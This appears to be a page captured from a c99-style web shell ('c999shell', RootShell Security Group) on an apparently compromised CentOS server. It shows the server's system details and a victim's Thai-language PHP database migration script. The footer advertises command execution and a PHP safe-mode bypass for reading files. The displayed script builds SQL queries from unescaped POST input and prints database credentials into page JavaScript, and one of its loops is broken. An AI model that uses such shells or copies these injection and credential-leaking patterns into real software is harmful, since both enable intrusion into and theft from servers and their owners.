Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/xmigratex/ drwxr-xr-x | |
| Viewing file: Select action/file-type: <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="style.css" />
<?php
include_once "special_fld.php";
include_once "cmp_func_pbri.php";
set_time_limit(0);
function findIndex($arr, $v){
$sf = sizeof($arr);
$index = 0;
for($i=0;i<$sf;$i++){
echo $arr[$i];
// if(strcmp($arr[$i],$v)==0){
// $rt[$index] = $i;
// $index++;
// }
}
return $rt;
}
$ts=microtime(true);
/*
if(empty($_GET))
echo "No GET variables";
else
print_r($_GET);
$pbri_s = $_POST["pbri_s"];
$pbri_u = $_POST["pbri_u"];
$pbri_p = $_POST["pbri_p"];
*/
?>
<table class='tb_1' width='100%' >
<tr><td class='h2'>
<?php
$dbreg = $_POST["dbreg"];
$dbmoreg = $_POST["dbmoreg"];
$dbppc = $_POST["dbppc"];
$localhost_s = $_POST["localhost_s"];
$localhost_u = $_POST["localhost_u"];
$localhost_p = $_POST["localhost_p"];
$dbNo = $_POST["dbNo"];
//echo "tUsername = $tUsername<br>";
//echo "tPassword = $tPassword<br>";
//echo "dbNo = $dbNo<br>";
if($dbNo==1) {
$oDB = $dbreg;
$moDB = $dbmoreg;
$filename = 'arr_pbri.php';
if (file_exists($filename)) {
include_once "arr_pbri.php";
}else{
echo "<font color='#FF0000'>";
echo " เกิดข้อผิดพลาด ";
echo "ไม่พบไฟล์ข้อมูลเทียบฟิลด์ $filename ";
echo "</font><br>";
die();
}
}elseif($dbNo==2) {
$oDB = $dbreg;
$moDB = $dbmoreg;
$filename = 'arr_reg.php';
if (file_exists($filename)) {
include_once "arr_reg.php";
}else{
echo "<font color='#FF0000'>";
echo " เกิดข้อผิดพลาด ";
echo "ไม่พบไฟล์ข้อมูลเทียบฟิลด์ $filename ";
echo "</font><br>";
die();
}
}elseif($dbNo==3) {
$oDB = $dbreg;
$moDB = $dbmoreg;
$filename = 'arr_all_reg.php';
if (file_exists($filename)) {
include_once "arr_all_reg.php";
}else{
echo "<font color='#FF0000'>";
echo " เกิดข้อผิดพลาด ";
echo "ไม่พบไฟล์ข้อมูลเทียบฟิลด์ $filename ";
echo "</font><br>";
die();
}
}elseif($dbNo==4) {
$oDB = $dbreg;
$moDB = $dbppc;
$filename = 'arr_people.php';
if (file_exists($filename)) {
include_once "arr_people.php";
}else{
echo "<font color='#FF0000'>";
echo " เกิดข้อผิดพลาด ";
echo "ไม่พบไฟล์ข้อมูลเทียบฟิลด์ $filename ";
echo "</font><br>";
die();
}
}
// ------------ connect
$ln_info = mysql_connect($localhost_s, $localhost_u, $localhost_p);
if (!$ln_info) {
echo "<font color='#FF0000'>$source_s";
die(' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' . mysql_error());
echo "</font >";
}else{
//echo "Connected $source_s successfully<br>";
}
$ln_reg = mysql_connect($localhost_s, $localhost_u, $localhost_p, true);
if (!$ln_reg) {
echo "<font color='#FF0000'>$source_s";
die(' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' . mysql_error());
echo "</font >";
}else{
//echo "Connected $source_s successfully<br>";
}
$ln_mo = mysql_connect($localhost_s, $localhost_u, $localhost_p, true);
if (!$ln_mo) {
echo "<font color='#FF0000'>$local_s";
die(' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' . mysql_error());
echo "</font >";
}else{
//echo "Connected $local_s successfully<br>";
}
// -------------- select DB
$db_info = mysql_select_db('information_schema', $ln_info);
//mysql_query("SET NAMES 'utf8'", $ln_info);
if (!$db_info) {
die ('ไม่สามารถเชื่อมต่อฐานข้อมูล information_schema ได้: ' . mysql_error());
}else{
//echo 'db_information_schema successfully<br>';
}
$db_reg = mysql_select_db($oDB, $ln_reg);
mysql_query("SET NAMES 'utf8'", $ln_reg);
if (!$db_reg) {
die ("ไม่สามารถเชื่อมต่อฐานข้อมูล $oDB ได้ โปรดตรวจสอบชื่อฐานข้อมูลอีกครั้ง : " . mysql_error());
}else{
echo "เชื่อมต่อ $oDB สำเร็จ<br>";
}
$db_mo = mysql_select_db($moDB, $ln_mo);
mysql_query("SET NAMES utf8", $ln_mo);
mysql_query("SET collation_connection = 'utf8_general_ci' ", $ln_mo);
if (!$db_mo) {
die ("ไม่สามารถเชื่อมต่อฐานข้อมูล $ทoDB ได้ โปรดตรวจสอบชื่อฐานข้อมูลอีกครั้ง : " . mysql_error());
}else{
echo "เชื่อมต่อ $moDB สำเร็จ<br><br>";
}
//echo '+++++++++++++++++++++++++++++++++++++<br><br>';
echo " * case 1 : ข้อมูลพื้นฐานของสบช.ที่วิทยาลัยยังไม่อัพเดต
<br /> * case 2 : ข้อมูลระบบทะเบียนที่มีมากกว่าข้อมูลพื้นฐานของสบช.
<br /> * case 3 : ข้อมูลที่PKตรงกันแต่ข้อมูลภายในไม่เท่ากัน <br /><br />";
$sizeoftb = sizeof($sm);
echo 'จำนวน '.$sizeoftb.' ตาราง <br>';
$records = 0;
$affected_records = 0;
?>
</td></tr>
</table>
<table class='tb_1' width='100%' >
<tr align='center'>
<th width=20 rowspan='2'></th>
<th colspan='4'>ฐานข้อมูล <? echo $oDB;?></th>
<th colspan='4'>ฐานข้อมูล <? echo $moDB;?></th>
<th rowspan='2'>ฟิลด์ที่<br />เปลี่ยนแปลง</th>
<th colspan='3'>case</th>
</tr>
<tr align='center'>
<td class='h2'>ชื่อตาราง</td>
<td class='h2'>จำนวนฟิลด์<br />ที่พบ</td>
<td class='h2'>จำนวนฟิลด์ที่<br />คัดลอกข้อมูล</td>
<td class='h2'>จำนวน<br />แถวข้อมูล</td>
<td class='h2'>ตาราง<br /><? echo $moDB;?></td>
<td class='h2'>จำนวนฟิลด์<br />ที่พบ</td>
<td class='h2'>จำนวนฟิลด์<br />ที่จัดเก็บข้อมูล</td>
<td class='h2'>จำนวน<br />แถวข้อมูล</td>
<td class='h2'>1</td>
<td class='h2'>2</td>
<td class='h2'>3</td>
</tr>
<?
for($tb_num=0; $tb_num < $sizeoftb; $tb_num++){
if($tb_num%2==0)
$class='class=r1';
else
$class='class=r1';
$otb_name = $sm[$tb_num]['old']['name'];
$motb_name = $sm[$tb_num]['new']['name'];
if($otb_name!='-'){
// หาจำนวนฟิลด์ จาก ฐานข้อมูล
$oQuery = "SELECT * FROM `COLUMNS` WHERE `TABLE_SCHEMA` LIKE '".$oDB."' AND `TABLE_NAME` LIKE '".$otb_name."'";
$moQuery = "SELECT * FROM `COLUMNS` WHERE `TABLE_SCHEMA` LIKE '$moDB' AND `TABLE_NAME` LIKE '".$motb_name."'";
$oRS = mysql_query($oQuery, $ln_info);
if (!$oRS) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $oQuery;
die($message);
}
$oFld_num = mysql_num_rows($oRS);
$moRS = mysql_query($moQuery, $ln_info);
if (!$moRS) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $moQuery;
die($message);
}
$moFld_num = mysql_num_rows($moRS);
// ความแตกต่างระหว่างฟิลด
$plus = sizeof($sm[$tb_num]['plus']);
$minus = sizeof($sm[$tb_num]['minus']);
$oFld_numA = sizeof($sm[$tb_num]['old']['fld']) - $plus;
$moFld_numA = sizeof($sm[$tb_num]['new']['fld']) - $minus ;
$Fld_diff = '';
if( $plus != 0 ){
$Fld_diff .= "+ $plus<br>";
}
if( $minus != 0 ){
$Fld_diff .= " - $minus";
//$rt = findIndex($sm[$tb_num]['new']['fld'], '-');
}
?>
<? //หาจำนวนแถวข้อมูล
$message = "";
$query = "SELECT * FROM `$otb_name` WHERE 1;";
$result = mysql_query($query, $ln_reg);
$num_row = mysql_num_rows($result);
$query = "SELECT * FROM `$motb_name` WHERE 1;";
$result = mysql_query($query, $ln_mo);
$affected = mysql_num_rows($result);
$color_f = ($num_row!=$affected)?"#FF0000":"#000000";
$query = getQryPbriChkData($oDB,$otb_name,$moDB,$motb_name,1);
if($query!=''){
$result = mysql_query($query, $ln_reg);
$num_case1 = mysql_num_rows($result);
}else{
$num_case1 = '-';
}
$query = getQryPbriChkData($oDB,$otb_name,$moDB,$motb_name,2);
if($query!=''){
$result = mysql_query($query, $ln_reg);
$num_case2 = mysql_num_rows($result);
}else{
$num_case2 = '-';
}
$query = getQryPbriChkData($oDB,$otb_name,$moDB,$motb_name,3);
if($query!=''){
$result = mysql_query($query, $ln_reg);
$num_case3 = mysql_num_rows($result);
}else{
$num_case3 = '-';
}
?>
<tr <?php echo $class; ?>>
<td><?=$tb_num+1?></td>
<td ><?=$otb_name?></td>
<td align='right'><?=$oFld_num?></td>
<td align='right'><?=$oFld_numA?></td>
<td align='right'><font color=<?=$color_f?>><?=$num_row;?></font></td>
<td ><?=$motb_name?></td>
<td align='right'><?=$moFld_num?></td>
<td align='right'><?=$moFld_numA?></td>
<td align='right'><font color=<?=$color_f?>><?=$affected;?></font></td>
<td align='right'><?=$Fld_diff;?></td>
<td align='right' onmouseover="this.style.cursor='pointer'; "><span onClick="pop('<?=$localhost_s?>', '<?=$localhost_u?>', '<?=$localhost_p?>','<?=$oDB?>','<?=$otb_name?>','<?=$moDB?>','<?=$motb_name?>',1)">
<font color=<? echo ($num_case1>0)?'#4400ff':'#000000';?>><?=$num_case1;?>
</font></span>
</td>
<td align='right' onmouseover="this.style.cursor='pointer'; "><span onClick="pop('<?=$localhost_s?>', '<?=$localhost_u?>', '<?=$localhost_p?>','<?=$oDB?>','<?=$otb_name?>','<?=$moDB?>','<?=$motb_name?>',2)"><font color=<? echo ($num_case2>0)?'#FF0000':'#000000';?>>
<?=$num_case2;?></font></span></td>
<td align='right' onmouseover="this.style.cursor='pointer'; "><span onClick="pop('<?=$localhost_s?>', '<?=$localhost_u?>', '<?=$localhost_p?>','<?=$oDB?>','<?=$otb_name?>','<?=$moDB?>','<?=$motb_name?>',3)"><font color=<? echo ($num_case3>0)?'#FF0000':'#000000';?>>
<?=$num_case3;?></font></span></td>
</font>
</tr>
<?
}else{
$moQuery = "SELECT * FROM `COLUMNS` WHERE `TABLE_SCHEMA` LIKE '$moDB' AND `TABLE_NAME` LIKE '".$motb_name."'";
$moRS = mysql_query($moQuery, $ln_info);
if (!$moRS) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $moQuery;
die($message);
}
$moFld_num = mysql_num_rows($moRS);
$moQuery = "SELECT * FROM `$motb_name`";
$moRS = mysql_query($moQuery, $ln_mo);
if (!$moRS) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $moQuery;
die($message);
}
$affected = mysql_num_rows($moRS);
?>
<tr><td><?=$tb_num+1?></td>
<td><?=$otb_name?> </td>
<td align='right'>-</td>
<td align='right'>-</td>
<td align='right'>-</td>
<td><?=$motb_name?></td>
<td align='right'><?=$moFld_num?></td>
<td align='right'>-</td>
<td align='right'><?=$affected?></td>
<td align='right'>-</td>
<td align='right'>-</td>
<td align='right'>-</td>
<td align='right'>-</td>
</tr>
<?
}// END if != '-'
} // END for $tb_num
$te=microtime(true);
$tt=($te-$ts)/60;
mysql_close($ln_info);
mysql_close($ln_reg);
mysql_close($ln_mo);
set_time_limit(30);
?>
</table> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]-- |